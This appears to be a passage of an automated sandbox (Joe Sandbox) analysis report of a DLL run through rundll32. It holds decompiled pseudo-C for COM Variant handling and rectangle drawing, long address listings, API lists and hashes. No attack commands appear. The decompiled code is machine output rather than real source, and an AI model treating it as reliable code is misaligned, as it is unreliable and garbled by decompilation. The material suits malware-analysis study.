                                                                                                            					} else {
                                                                                                            						_t164 = lstrlenA(_t235);
                                                                                                            						 *(_t247 - 0x44) = _t164;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
                                                                                                            					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
                                                                                                            						 *((intOrPtr*)(_t247 - 0x40)) = 1;
                                                                                                            						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
                                                                                                            					}
                                                                                                            					if(_t164 != _t214) {
                                                                                                            						_t244 = E1001F77E(_t164 << 4);
                                                                                                            						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
                                                                                                            						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
                                                                                                            						_t253 = _t253 + 0x10;
                                                                                                            						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
                                                                                                            						 *(_t247 - 0x14) = _t235;
                                                                                                            						 *(_t247 - 0x10) = _t245;
                                                                                                            						if( *_t235 != 0) {
                                                                                                            							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
                                                                                                            							_t246 =  &(_t245[4]);
                                                                                                            							_t22 = _t200 - 4; // 0xfffffff9
                                                                                                            							_t217 = _t22;
                                                                                                            							 *(_t247 - 0x18) = _t246;
                                                                                                            							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
                                                                                                            							_t238 = 4;
                                                                                                            							do {
                                                                                                            								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
                                                                                                            								_t224 =  *(_t247 - 0x10);
                                                                                                            								 *_t224 = _t203;
                                                                                                            								if((_t203 & 0x00000040) != 0) {
                                                                                                            									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
                                                                                                            								}
                                                                                                            								_t204 =  *_t224 & 0x0000ffff;
                                                                                                            								_t263 = _t204 - 0x4002;
                                                                                                            								if(_t263 > 0) {
                                                                                                            									_t205 = _t204 - 0x4003;
                                                                                                            									__eflags = _t205 - 0x12;
                                                                                                            									if(_t205 <= 0x12) {
                                                                                                            										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
                                                                                                            											case 0:
                                                                                                            												goto L36;
                                                                                                            											case 1:
                                                                                                            												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                                                            												_t217 = _t217 + _t238;
                                                                                                            												_t207 =  *_t217;
                                                                                                            												asm("sbb ecx, ecx");
                                                                                                            												 *_t207 =  ~( *_t207) & 0x0000ffff;
                                                                                                            												goto L37;
                                                                                                            											case 2:
                                                                                                            												goto L38;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									if(_t263 == 0) {
                                                                                                            										L36:
                                                                                                            										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                                                            										_t217 = _t217 + _t238;
                                                                                                            										__eflags = _t217;
                                                                                                            										_t207 =  *_t217;
                                                                                                            										L37:
                                                                                                            										 *_t246 = _t207;
                                                                                                            									} else {
                                                                                                            										_t209 = _t204;
                                                                                                            										if(_t209 <= 0x13) {
                                                                                                            											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
                                                                                                            												case 0:
                                                                                                            													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                                                            													_t217 = _t217 + _t238;
                                                                                                            													_t210 =  *_t217;
                                                                                                            													goto L16;
                                                                                                            												case 1:
                                                                                                            													goto L36;
                                                                                                            												case 2:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                            													__eax =  *(__ebp + 0x1c);
                                                                                                            													__ebx = __ebx + 8;
                                                                                                            													 *__esi =  *( *(__ebp + 0x1c));
                                                                                                            													goto L38;
                                                                                                            												case 3:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                            													__eax =  *(__ebp + 0x1c);
                                                                                                            													__ebx = __ebx + 8;
                                                                                                            													 *__esi =  *( *(__ebp + 0x1c));
                                                                                                            													goto L38;
                                                                                                            												case 4:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													__eflags = __ebx;
                                                                                                            													__eax =  *__ebx;
                                                                                                            													__ecx =  *__eax;
                                                                                                            													goto L22;
                                                                                                            												case 5:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													__eax =  *__ebx;
                                                                                                            													_push(__eax);
                                                                                                            													 *(__ebp - 0x18) = __eax;
                                                                                                            													__imp__#2();
                                                                                                            													__eflags =  *(__ebp - 0x18);
                                                                                                            													 *__esi = __eax;
                                                                                                            													if( *(__ebp - 0x18) != 0) {
                                                                                                            														__eflags = __eax;
                                                                                                            														if(__eax == 0) {
                                                                                                            															goto L25;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													goto L38;
                                                                                                            												case 6:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													 *__ebx =  ~( *__ebx);
                                                                                                            													asm("sbb eax, eax");
                                                                                                            													L16:
                                                                                                            													 *_t246 = _t210;
                                                                                                            													goto L38;
                                                                                                            												case 7:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                            													__edi =  *(__ebp - 0x10);
                                                                                                            													__ebx = __ebx + 4;
                                                                                                            													__esi =  *__ebx;
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													asm("movsd");
                                                                                                            													__esi =  *(__ebp - 0x18);
                                                                                                            													_push(4);
                                                                                                            													_pop(__edi);
                                                                                                            													goto L38;
                                                                                                            												case 8:
                                                                                                            													L26:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													__eax =  *__ebx;
                                                                                                            													__eflags = __eax;
                                                                                                            													 *(__ebp - 0x18) = __eax;
                                                                                                            													if(__eax != 0) {
                                                                                                            														__eax = lstrlenA( *(__ebp - 0x18));
                                                                                                            														__eax = __eax + 1;
                                                                                                            														 *(__ebp - 0x24) = __eax;
                                                                                                            														__eax = __eax + __eax;
                                                                                                            														__eax = __eax + 3;
                                                                                                            														__eax = __eax & 0xfffffffc;
                                                                                                            														__eflags = __eax;
                                                                                                            														__eax = __esp;
                                                                                                            														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
                                                                                                            													}
                                                                                                            													_push(__eax);
                                                                                                            													__imp__#2();
                                                                                                            													__eflags =  *(__ebp - 0x18);
                                                                                                            													 *__esi = __eax;
                                                                                                            													if( *(__ebp - 0x18) != 0) {
                                                                                                            														__eflags = __eax;
                                                                                                            														if(__eax == 0) {
                                                                                                            															L25:
                                                                                                            															__eax = E1001CE3B(__ecx);
                                                                                                            															goto L26;
                                                                                                            														}
                                                                                                            													}
                                                                                                            													__eax =  *(__ebp - 0x10);
                                                                                                            													 *( *(__ebp - 0x10)) = 8;
                                                                                                            													goto L38;
                                                                                                            												case 9:
                                                                                                            													goto L38;
                                                                                                            												case 0xa:
                                                                                                            													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                            													__ebx = __ebx + __edi;
                                                                                                            													 *__esi =  *__ebx;
                                                                                                            													goto L38;
                                                                                                            												case 0xb:
                                                                                                            													__eax =  *(__ebp + 0x1c);
                                                                                                            													__eax =  *(__ebp + 0x1c) + 8;
                                                                                                            													__ecx =  *__eax;
                                                                                                            													 *(__ebp + 0x1c) = __eax;
                                                                                                            													__ebx = __ebx + 8;
                                                                                                            													L22:
                                                                                                            													 *__esi = __ecx;
                                                                                                            													__esi[4] = __eax;
                                                                                                            													goto L38;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L38:
                                                                                                            								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
                                                                                                            								_t246 = _t246 - 0x10;
                                                                                                            								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
                                                                                                            								 *(_t247 - 0x18) = _t246;
                                                                                                            							} while ( *( *(_t247 - 0x14)) != 0);
                                                                                                            							_t235 =  *(_t247 + 0x18);
                                                                                                            							_t214 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t242 = 0;
                                                                                                            					E10010592(_t247 - 0x3c);
                                                                                                            					if( *(_t247 + 0x10) != _t214) {
                                                                                                            						_t242 = _t247 - 0x3c;
                                                                                                            					}
                                                                                                            					E10011C50(_t247 - 0x6c, _t214, 0x20);
                                                                                                            					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
                                                                                                            					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
                                                                                                            					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
                                                                                                            					_t172 =  *(_t247 - 0x44);
                                                                                                            					if(_t172 != _t214) {
                                                                                                            						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
                                                                                                            						_t242 = _t235;
                                                                                                            						if( *_t235 != 0) {
                                                                                                            							do {
                                                                                                            								_t192 =  *_t242;
                                                                                                            								if(_t192 == 8 || _t192 == 0xe) {
                                                                                                            									__imp__#9(_t214);
                                                                                                            								}
                                                                                                            								_t214 = _t214 - 0x10;
                                                                                                            								_t242 = _t242 + 1;
                                                                                                            								_t273 =  *_t242;
                                                                                                            							} while ( *_t242 != 0);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_push( *((intOrPtr*)(_t247 - 0x4c)));
                                                                                                            					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
                                                                                                            					_pop(_t221);
                                                                                                            					if( *(_t247 + 0x18) >= 0) {
                                                                                                            						L63:
                                                                                                            						_t242 =  *(_t247 + 0x10);
                                                                                                            						__eflags = _t242;
                                                                                                            						if(_t242 != 0) {
                                                                                                            							__eflags = _t242 - 0xc;
                                                                                                            							if(_t242 != 0xc) {
                                                                                                            								_t174 = _t247 - 0x3c;
                                                                                                            								__imp__#12(_t174, _t174, 0, _t242);
                                                                                                            								_t236 = _t174;
                                                                                                            								__eflags = _t236;
                                                                                                            								if(_t236 < 0) {
                                                                                                            									__imp__#9(_t247 - 0x3c);
                                                                                                            									_push(_t236);
                                                                                                            									goto L67;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L68;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						__imp__#9(_t247 - 0x3c);
                                                                                                            						if( *(_t247 + 0x18) == 0x80020009) {
                                                                                                            							__eflags =  *(_t247 - 0x54);
                                                                                                            							if( *(_t247 - 0x54) != 0) {
                                                                                                            								 *(_t247 - 0x54)(_t247 - 0x6c);
                                                                                                            							}
                                                                                                            							_t178 = E1001F77E(0x20);
                                                                                                            							_pop(_t221);
                                                                                                            							 *(_t247 + 0x14) = _t178;
                                                                                                            							__eflags = _t178;
                                                                                                            							 *(_t247 - 4) = 0;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								_t243 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            							} else {
                                                                                                            								_push( *((intOrPtr*)(_t247 - 0x6c)));
                                                                                                            								_t221 = _t178;
                                                                                                            								_push(0);
                                                                                                            								_push(0);
                                                                                                            								_t243 = E10039A54(_t178, __eflags);
                                                                                                            							}
                                                                                                            							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
                                                                                                            							__eflags =  *(_t247 - 0x68);
                                                                                                            							_t237 = __imp__#6;
                                                                                                            							if( *(_t247 - 0x68) != 0) {
                                                                                                            								_t113 = _t243 + 0x18; // 0x18
                                                                                                            								_t221 = _t113;
                                                                                                            								E1000860E(_t113,  *(_t247 - 0x68));
                                                                                                            								 *_t237( *(_t247 - 0x68));
                                                                                                            							}
                                                                                                            							__eflags =  *(_t247 - 0x64);
                                                                                                            							if( *(_t247 - 0x64) != 0) {
                                                                                                            								_t117 = _t243 + 0xc; // 0xc
                                                                                                            								_t221 = _t117;
                                                                                                            								E1000860E(_t117,  *(_t247 - 0x64));
                                                                                                            								 *_t237( *(_t247 - 0x64));
                                                                                                            							}
                                                                                                            							__eflags =  *(_t247 - 0x60);
                                                                                                            							if( *(_t247 - 0x60) != 0) {
                                                                                                            								_t121 = _t243 + 0x14; // 0x14
                                                                                                            								_t221 = _t121;
                                                                                                            								E1000860E(_t121,  *(_t247 - 0x60));
                                                                                                            								 *_t237( *(_t247 - 0x60));
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
                                                                                                            							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
                                                                                                            							 *(_t247 + 0x14) = _t243;
                                                                                                            							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
                                                                                                            							goto L63;
                                                                                                            						} else {
                                                                                                            							_push( *(_t247 + 0x18));
                                                                                                            							L67:
                                                                                                            							E100387D9(_t221);
                                                                                                            							L68:
                                                                                                            							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
                                                                                                            							if(_t161 <= 0x13) {
                                                                                                            								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
                                                                                                            									case 0:
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 1:
                                                                                                            										__ecx =  *(__ebp - 0x34);
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 2:
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 3:
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
                                                                                                            										goto L79;
                                                                                                            									case 4:
                                                                                                            										__ecx =  *(__ebp - 0x34);
                                                                                                            										__eax =  *(__ebp + 0x14);
                                                                                                            										 *__eax =  *(__ebp - 0x34);
                                                                                                            										__ecx =  *(__ebp - 0x30);
                                                                                                            										 *(__eax + 4) =  *(__ebp - 0x30);
                                                                                                            										goto L79;
                                                                                                            									case 5:
                                                                                                            										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
                                                                                                            										_push( *(__ebp - 0x34));
                                                                                                            										__imp__#6();
                                                                                                            										goto L79;
                                                                                                            									case 6:
                                                                                                            										__ecx =  *(__ebp + 0x14);
                                                                                                            										__eax = 0;
                                                                                                            										__eflags =  *(__ebp - 0x34) - __bx;
                                                                                                            										__eax = 0 | __eflags != 0x00000000;
                                                                                                            										 *( *(__ebp + 0x14)) = __eflags != 0;
                                                                                                            										goto L79;
                                                                                                            									case 7:
                                                                                                            										__edi =  *(__ebp + 0x14);
                                                                                                            										__esi = __ebp - 0x3c;
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										goto L79;
                                                                                                            									case 8:
                                                                                                            										goto L79;
                                                                                                            									case 9:
                                                                                                            										_t161 =  *(_t247 + 0x14);
                                                                                                            										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
                                                                                                            										goto L79;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				L79:
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
                                                                                                            				return _t161;
                                                                                                            			}






































                                                                                                            0x10039c19
                                                                                                            0x10039c1f
                                                                                                            0x00000000
                                                                                                            0x10039c26
                                                                                                            0x10039c29
                                                                                                            0x10039c2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c54
                                                                                                            0x10039c58
                                                                                                            0x10039c5d
                                                                                                            0x10039c60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c67
                                                                                                            0x10039c6b
                                                                                                            0x10039c70
                                                                                                            0x10039c73
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c7a
                                                                                                            0x10039c7d
                                                                                                            0x10039c7d
                                                                                                            0x10039c7f
                                                                                                            0x10039c81
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c90
                                                                                                            0x10039c93
                                                                                                            0x10039c95
                                                                                                            0x10039c97
                                                                                                            0x10039c98
                                                                                                            0x10039c9b
                                                                                                            0x10039ca1
                                                                                                            0x10039ca5
                                                                                                            0x10039ca7
                                                                                                            0x10039cad
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039caf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d10
                                                                                                            0x10039d13
                                                                                                            0x10039d17
                                                                                                            0x10039d19
                                                                                                            0x10039c2e
                                                                                                            0x10039c2e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039d20
                                                                                                            0x10039d24
                                                                                                            0x10039d27
                                                                                                            0x10039d2a
                                                                                                            0x10039d2c
                                                                                                            0x10039d2d
                                                                                                            0x10039d2e
                                                                                                            0x10039d2f
                                                                                                            0x10039d30
                                                                                                            0x10039d33
                                                                                                            0x10039d35
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039cba
                                                                                                            0x10039cba
                                                                                                            0x10039cbd
                                                                                                            0x10039cbf
                                                                                                            0x10039cc1
                                                                                                            0x10039cc3
                                                                                                            0x10039cc6
                                                                                                            0x10039ccb
                                                                                                            0x10039cd1
                                                                                                            0x10039cd2
                                                                                                            0x10039cd5
                                                                                                            0x10039cd7
                                                                                                            0x10039cda
                                                                                                            0x10039cda
                                                                                                            0x10039ce2
                                                                                                            0x10039cee
                                                                                                            0x10039cee
                                                                                                            0x10039cf3
                                                                                                            0x10039cf4
                                                                                                            0x10039cfa
                                                                                                            0x10039cfe
                                                                                                            0x10039d00
                                                                                                            0x10039d02
                                                                                                            0x10039d04
                                                                                                            0x10039cb5
                                                                                                            0x10039cb5
                                                                                                            0x00000000
                                                                                                            0x10039cb5
                                                                                                            0x10039d04
                                                                                                            0x10039d06
                                                                                                            0x10039d09
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c46
                                                                                                            0x10039c49
                                                                                                            0x10039c4d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c36
                                                                                                            0x10039c39
                                                                                                            0x10039c3c
                                                                                                            0x10039c3e
                                                                                                            0x10039c41
                                                                                                            0x10039c83
                                                                                                            0x10039c83
                                                                                                            0x10039c88
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039c1f
                                                                                                            0x10039c19
                                                                                                            0x10039c0e
                                                                                                            0x10039d69
                                                                                                            0x10039d69
                                                                                                            0x10039d6d
                                                                                                            0x10039d70
                                                                                                            0x10039d79
                                                                                                            0x10039d79
                                                                                                            0x10039d82
                                                                                                            0x10039d85
                                                                                                            0x10039d85
                                                                                                            0x10039bc7
                                                                                                            0x10039d8b
                                                                                                            0x10039d8d
                                                                                                            0x10039d96
                                                                                                            0x10039d98
                                                                                                            0x10039d98
                                                                                                            0x10039da2
                                                                                                            0x10039daa
                                                                                                            0x10039dac
                                                                                                            0x10039dd2
                                                                                                            0x10039dd5
                                                                                                            0x10039dda
                                                                                                            0x10039de5
                                                                                                            0x10039de9
                                                                                                            0x10039deb
                                                                                                            0x10039ded
                                                                                                            0x10039ded
                                                                                                            0x10039df1
                                                                                                            0x10039df8
                                                                                                            0x10039df8
                                                                                                            0x10039dfe
                                                                                                            0x10039e01
                                                                                                            0x10039e02
                                                                                                            0x10039e02
                                                                                                            0x10039ded
                                                                                                            0x10039deb
                                                                                                            0x10039e07
                                                                                                            0x10039e0a
                                                                                                            0x10039e14
                                                                                                            0x10039e15
                                                                                                            0x10039ecc
                                                                                                            0x10039ecc
                                                                                                            0x10039ecf
                                                                                                            0x10039ed2
                                                                                                            0x10039ed8
                                                                                                            0x10039edc
                                                                                                            0x10039ee0
                                                                                                            0x10039ee5
                                                                                                            0x10039eeb
                                                                                                            0x10039eed
                                                                                                            0x10039eef
                                                                                                            0x10039ef5
                                                                                                            0x10039efb
                                                                                                            0x00000000
                                                                                                            0x10039efb
                                                                                                            0x10039eef
                                                                                                            0x00000000
                                                                                                            0x10039edc
                                                                                                            0x10039e1b
                                                                                                            0x10039e1f
                                                                                                            0x10039e2c
                                                                                                            0x10039e36
                                                                                                            0x10039e39
                                                                                                            0x10039e3f
                                                                                                            0x10039e3f
                                                                                                            0x10039e44
                                                                                                            0x10039e49
                                                                                                            0x10039e4a
                                                                                                            0x10039e4d
                                                                                                            0x10039e4f
                                                                                                            0x10039e52
                                                                                                            0x10039e64
                                                                                                            0x10039e64
                                                                                                            0x10039e54
                                                                                                            0x10039e54
                                                                                                            0x10039e57
                                                                                                            0x10039e59
                                                                                                            0x10039e5a
                                                                                                            0x10039e60
                                                                                                            0x10039e60
                                                                                                            0x10039e66
                                                                                                            0x10039e6a
                                                                                                            0x10039e6d
                                                                                                            0x10039e73
                                                                                                            0x10039e78
                                                                                                            0x10039e78
                                                                                                            0x10039e7b
                                                                                                            0x10039e83
                                                                                                            0x10039e83
                                                                                                            0x10039e85
                                                                                                            0x10039e88
                                                                                                            0x10039e8d
                                                                                                            0x10039e8d
                                                                                                            0x10039e90
                                                                                                            0x10039e98
                                                                                                            0x10039e98
                                                                                                            0x10039e9a
                                                                                                            0x10039e9d
                                                                                                            0x10039ea2
                                                                                                            0x10039ea2
                                                                                                            0x10039ea5
                                                                                                            0x10039ead
                                                                                                            0x10039ead
                                                                                                            0x10039eb2
                                                                                                            0x10039eb8
                                                                                                            0x10039ec4
                                                                                                            0x10039ec7
                                                                                                            0x00000000
                                                                                                            0x10039e2e
                                                                                                            0x10039e2e
                                                                                                            0x10039efc
                                                                                                            0x10039efc
                                                                                                            0x10039f01
                                                                                                            0x10039f04
                                                                                                            0x10039f0a
                                                                                                            0x10039f0c
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10039B2B
                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E98
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 344392101-0
                                                                                                            • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                                                            • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10033FCE(intOrPtr* __ecx, void* __eflags) {
                                                                                                            				void* __esi;
                                                                                                            				void* _t132;
                                                                                                            				void* _t145;
                                                                                                            				intOrPtr* _t226;
                                                                                                            				void* _t229;
                                                                                                            
                                                                                                            				E10011BF0(0x1003b231, _t229);
                                                                                                            				_t226 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x30)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
                                                                                                            				 *(_t229 - 4) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x28)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x20)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
                                                                                                            				 *(_t229 - 4) = 2;
                                                                                                            				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
                                                                                                            				CopyRect(_t229 - 0x44,  *(_t229 + 8));
                                                                                                            				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
                                                                                                            				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
                                                                                                            				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
                                                                                                            				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
                                                                                                            				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                                                            				_t235 =  *((intOrPtr*)(_t229 + 0x20));
                                                                                                            				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
                                                                                                            					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
                                                                                                            					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t229 - 0x18)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x10)) = 0;
                                                                                                            				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
                                                                                                            				 *(_t229 - 4) = 4;
                                                                                                            				if( *(_t229 + 0x14) != 0) {
                                                                                                            					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
                                                                                                            					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
                                                                                                            					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
                                                                                                            					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
                                                                                                            					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
                                                                                                            					E1001045D(_t229 - 0x24, _t229 - 0x44);
                                                                                                            					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
                                                                                                            					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
                                                                                                            						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
                                                                                                            						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
                                                                                                            					E10028E1A(_t226, _t229 - 0x1c);
                                                                                                            					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
                                                                                                            					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
                                                                                                            					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
                                                                                                            					E10029439(_t226,  *(_t229 + 0x14));
                                                                                                            				}
                                                                                                            				_t132 = _t229 - 0x14;
                                                                                                            				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
                                                                                                            					_t132 = _t229 - 0x34;
                                                                                                            				}
                                                                                                            				E10028E1A(_t226, _t132);
                                                                                                            				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
